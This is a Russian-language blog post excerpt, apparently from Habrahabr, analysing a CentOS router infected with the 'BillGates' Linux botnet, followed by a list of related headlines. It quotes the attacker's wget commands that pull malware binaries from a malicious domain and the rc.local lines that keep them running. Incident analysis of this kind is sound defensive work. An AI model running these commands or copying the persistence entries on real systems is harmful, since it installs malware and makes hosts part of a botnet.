Исследуем Linux Botnet «BillGates»
Написал мне вчера
lfatal1ty
, говорит, домашний роутер на x86 с CentOS как-то странно себя ведет, грузит канал под гигабит, и какой-то странный процесс «atddd» загружает процессор. Решил я залезть и посмотреть, что же там творится, и сразу понял, что кто-то пробрался на сервер и совершает с ним непотребства всякие. В процессах висели wget-ы на домен dgnfd564sdf.com и процессы atddd, cupsdd, cupsddh, ksapdd, kysapdd, skysapdd и xfsdxd, запущенные из /etc:
Скрытый текст
К сожалению, процессы не додумался скопировать
root 4741 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/sksapd
root 4753 0.0 0.0 41576 2268 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/xfsdx
root 4756 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/cupsdd
root 4757 0.0 0.0 41576 2268 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/kysapd
root 4760 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/ksapd
root 4764 0.0 0.0 41576 2268 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/atdd
root 4767 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/skysapd
К сожалению, процессы не додумался скопировать
Начальный анализ
Сначала я полез смотреть, что же вообще происходит и насколько серьезно была скомпрометирована система. Первое, что мне пришло в голову проверить — /etc/rc.local. Там было следующее:
cd /etc;./ksapdd
cd /etc;./kysapdd
cd /etc;./atddd
cd /etc;./ksapdd
cd /etc;./skysapdd
cd /etc;./xfsdxd
«Хмм, ладно», подумал я. Полез в rootовский crontab
Читать дальше →
Источник:Хабрахабр, Информационная безопасность
Похожие новости
- Банк для бизнеса «Бланк»: В МСП ждут ставку в 14% к лету 2024 года
- Сервис Финансист: 5 ошибок финдира, котоыре мешают бизнесу расти
- Fuzzing-тестирование. Практическое применение
- Подводные грабли экспертных утилит при работе с инцидентами
- Attaque a-la russe: атака с помощью промт-инъекций русскоязычных моделей семейства Saiga2
- Рейтинг онлайн-кинотеатров в России за первый квартал 2024 года
- Как один опытный разработчик за три дня потерял аккаунт в Телеграме, а второй чуть не перевел «другу» 100 тысяч рублей
- Обзор K8s LAN Party — сборника задач по поиску уязвимостей в кластере Kubernetes прямо в браузере
- [Перевод] Настройка Kerberos аутентификации в OpenAM
- Исследование веб-приложений с помощью утилиты Ffuf